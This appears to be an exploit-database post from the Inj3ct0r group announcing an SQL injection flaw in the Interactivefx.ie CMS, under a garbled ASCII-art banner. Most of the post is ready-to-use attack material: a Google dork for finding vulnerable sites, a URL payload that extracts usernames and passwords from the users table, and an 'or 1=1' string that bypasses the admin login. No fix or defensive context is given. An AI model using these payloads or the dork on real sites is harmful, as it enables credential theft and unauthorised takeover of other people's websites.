========================================================== ==========
Interactivefx. ie cms SQL Injection Vulnerability
========================================================== ==========
1-=- =-= 0
0 _ 1
1/_ '/\__/_ '0
0/\ _, ___/\ _ ___, _/_ ___ 1
1/_ '/_ \ _ <_/___/' _ 0
0 // \__/\_\_/1
1 \_\_\_\_ \____/\____ \\__ \\____/\_ 0
0/_/\ _/___/____/_/___/_/1
1 \____/> Exploit database separated by exploit 0
0/___/type (local, remote, DoS, etc.) 1
1 0
-= -=-1
# [+] Discovered By: Inj3ct0r
# [+] Site: Inj3ct0r.com
# [+] Support e-mail: submit [at] inj3ct0r.com
# [+] Visit: inj3ct0r.com, inj3ct0r.org, inj3ct0r.net
Site product: Interactivefx. ie
Product: Interactivefx. ie CMS
Google dork: "Copyright Interactivefx. ie"
SQL Inj3ct0r Exploit:
Http: // server/event-details.php? Id = 223 + select + username, password + from + users /*
Bypass authentication in admin panel:
Login: or 1 = 1 /*
Pass: anypassyouwish